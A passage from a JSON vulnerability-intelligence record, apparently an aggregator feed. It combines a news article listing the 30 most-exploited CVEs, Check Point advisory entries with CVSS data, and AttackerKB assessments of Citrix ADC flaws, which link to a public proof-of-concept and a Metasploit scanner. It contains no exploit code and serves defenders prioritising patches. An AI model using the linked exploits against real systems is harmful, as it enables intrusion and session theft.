MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and 
[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): [CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] 
puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", 
"CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:38:28", "description": "An authentication bypass vulnerability exists in Citrix ADC and Citrix gateway. Successful exploitation of this vulnerability could allow a remote attacker to gain unauthorized access to the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 2.5}, "published": "2020-08-03T00:00:00", "type": "checkpoint_advisories", "title": "Citrix ADC Authentication Bypass (CVE-2020-8193; CVE-2020-8195; CVE-2020-8196)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-08-03T00:00:00", "id": "CPAI-2020-0712", "href": "", "cvss": {"score": 
5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-04-19T18:31:26", "description": "A file upload vulnerability exists in Atlassian Crowd webserver. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-16T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Crowd Remote Code Execution (CVE-2019-11580)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2019-07-16T00:00:00", "id": "CPAI-2019-0860", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:12:16", "description": "A remote code execution vulnerability exists in Progress Telerik UI for Asp.Net Ajax. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-09T00:00:00", "type": "checkpoint_advisories", "title": "Progress Telerik UI Remote Code Execution (CVE-2019-18935)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-09-19T00:00:00", "id": "CPAI-2019-1914", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:40:23", "description": "A remote code execution vulnerability exists in Zoho ManageEngine Desktop Central. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-08T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine Remote Code Execution (CVE-2020-10189)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-08T00:00:00", "id": "CPAI-2020-0118", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:45:10", "description": "A remote code execution vulnerability has been reported in the Apache Commons Java Collections Framework. 
A remote unauthenticated attacker may exploit this vulnerability by sending a crafted serialized object to an application which uses the Apache Commons Java Collections Framework as part of its code path, and thereby execute arbitrary code on the server running the application.", "cvss3": {}, "published": "2015-11-19T00:00:00", "type": "checkpoint_advisories", "title": "WebLogic Apache Commons Java Collections Library Remote Code Execution (CVE-2015-4852)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852"], "modified": "2017-01-31T00:00:00", "id": "CPAI-2015-1321", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-14T18:11:37", "description": "A command injection vulnerability exists in Draytek Vigor. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-07T00:00:00", "type": "checkpoint_advisories", "title": "Draytek Vigor Command Injection (CVE-2020-8515)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2022-11-14T00:00:00", "id": "CPAI-2020-0320", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:18:18", "description": "A buffer overflow vulnerability exists in Exim Mail Server. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system or cause application crashes.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-10-21T00:00:00", "type": "checkpoint_advisories", "title": "Exim Mail Server Buffer Overflow (CVE-2018-6789)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6789"], "modified": "2020-10-21T00:00:00", "id": "CPAI-2018-1694", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:26:39", "description": "An insecure deserialization vulnerability exists in the Flex integration service of Adobe ColdFusion. The vulnerability is due to the lack of input validation. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-07-29T00:00:00", "type": "checkpoint_advisories", "title": "Adobe ColdFusion DataServicesCFProxy Insecure Deserialization (CVE-2018-4939)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4939"], "modified": "2018-08-15T00:00:00", "id": "CPAI-2018-0772", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:33:31", "description": "A command injection vulnerability exists in Symantec Messaging Gateway. 
The cause of the vulnerability due to combination of an authentication bypass in LoginAction and a lack of sanitization on user input.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-03T00:00:00", "type": "checkpoint_advisories", "title": "Symantec Messaging Gateway performRestore Command Injection (CVE-2017-6327)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6327"], "modified": "2017-09-06T00:00:00", "id": "CPAI-2017-0728", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-07-20T20:13:23", "description": "Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in limited information disclosure to low privileged users.\n\n \n**Recent assessments:** \n \n**elligottmc** at October 22, 2020 1:02pm UTC reported:\n\nThis is an update based on the assessment provided in the more general topic for the Citrix vulns disclosed in <https://support.citrix.com/article/CTX276688> 
which include this CVE. As API queries to this CVE do not contain this data, reflecting it in this topic.\n\nLink to assessment: \n<https://attackerkb.com/assessments/50e7e3c5-644c-46ae-b650-1ef45cec22ad>\n\nLink to relevant url provided in the assessment: \n<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/>\n\nAdditional link which provides a PoC: \n<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>\n\nIt is also included in the Oct 20 NSA Advisory on vulns exploited by Chinese APTs: \n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n**gwillcox-r7** at October 20, 2020 5:54pm UTC reported:\n\nThis is an update based on the assessment provided in the more general topic for the Citrix vulns disclosed in <https://support.citrix.com/article/CTX276688> which include this CVE. As API queries to this CVE do not contain this data, reflecting it in this topic.\n\nLink to assessment: \n<https://attackerkb.com/assessments/50e7e3c5-644c-46ae-b650-1ef45cec22ad>\n\nLink to relevant url provided in the assessment: \n<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/>\n\nAdditional link which provides a PoC: \n<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>\n\nIt is also included in the Oct 20 NSA Advisory on vulns exploited by Chinese APTs: \n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.5, "privilegesRequired": "NONE", 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 2.5}, "published": "2020-07-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-8196", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-07-24T00:00:00", "id": "AKB:3014CE3B-5D5F-4310-AB9F-3023E9B7126C", "href": "https://attackerkb.com/topics/r0FRieLWQM/cve-2020-8196", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-10-18T16:43:03", "description": "Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints.\n\n \n**Recent assessments:** \n \n**mekhalleh** at July 12, 2020 6:17pm UTC reported:\n\nFull details are here : <https://dmaasland.github.io/posts/citrix.html>\n\nPublic reporting on July 8th, 2020 by Donny Maasland discussed how the vulnerability could be exploited.\n\nAs of July 10th, RIFT has confirmed that this vulnerability can be used to extract valid VPN sessions from a vulnerable instance (cf. 
<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/>).\n\nI write quicly a metasploit auxilary scanner and tested on netscaler 12.1 build 57.18 (<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>)\n\n**gwillcox-r7** at October 20, 2020 5:52pm UTC reported:\n\nFull details are here : <https://dmaasland.github.io/posts/citrix.html>\n\nPublic reporting on July 8th, 2020 by Donny Maasland discussed how the vulnerability could be exploited.\n\nAs of July 10th, RIFT has confirmed that this vulnerability can be used to extract valid VPN sessions from a vulnerable instance (cf. <https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/>).\n\nI write quicly a metasploit auxilary scanner and tested on netscaler 12.1 build 57.18 (<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>)\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2020-07-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-8193", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2023-10-07T00:00:00", "id": "AKB:EF56F4A3-B95C-4CA0-9E19-BA58E1295785", "href": "https://attackerkb.com/topics/1F4m9YYhx2/cve-2020-8193", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-07-20T20:13:22", "description": "Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 resulting in limited information disclosure to low privileged users.\n\n \n**Recent assessments:** \n \n**elligottmc** at October 22, 2020 12:59pm UTC reported:\n\nThis is an update based on the assessment provided in the more general topic for the Citrix vulns disclosed in <https://support.citrix.com/article/CTX276688> which include this CVE. As API queries to this CVE do not contain this data, reflecting it in this topic.\n\nLink to assessment: \n<https://attackerkb.com/assessments/50e7e3c5-644c-46ae-b650-1ef45cec22ad>\n\nLink to relevant url provided in the assessment: \n<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/>\n\nAdditional link which provides a PoC: \n<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>\n\nAlso, as mentioned by **@gwillcox-r7** already, it is included in the Oct 20 NSA advisory.\n\n**gwillcox-r7** at October 20, 2020 5:53pm UTC reported:\n\nThis is an update based on the assessment provided in the more general topic for the Citrix vulns disclosed in <https://support.citrix.com/article/CTX276688> which include this CVE. 
As API queries to this CVE do not contain this data, reflecting it in this topic.\n\nLink to assessment: \n<https://attackerkb.com/assessments/50e7e3c5-644c-46ae-b650-1ef45cec22ad>\n\nLink to relevant url provided in the assessment: \n<https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/>\n\nAdditional link which provides a PoC: \n<https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi>\n\nAlso, as mentioned by **@gwillcox-r7** already, it is included in the Oct 20 NSA advisory.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 2.5}, "published": "2020-07-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-8195", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196"], "modified": "2020-07-24T00:00:00", "id": "AKB:43680748-EEC0-4395-9572-2A3534D61D88", "href": "https://attackerkb.com/topics/rSz4fDlp1Z/cve-2020-8195", "cvss": {"score": 5.0, 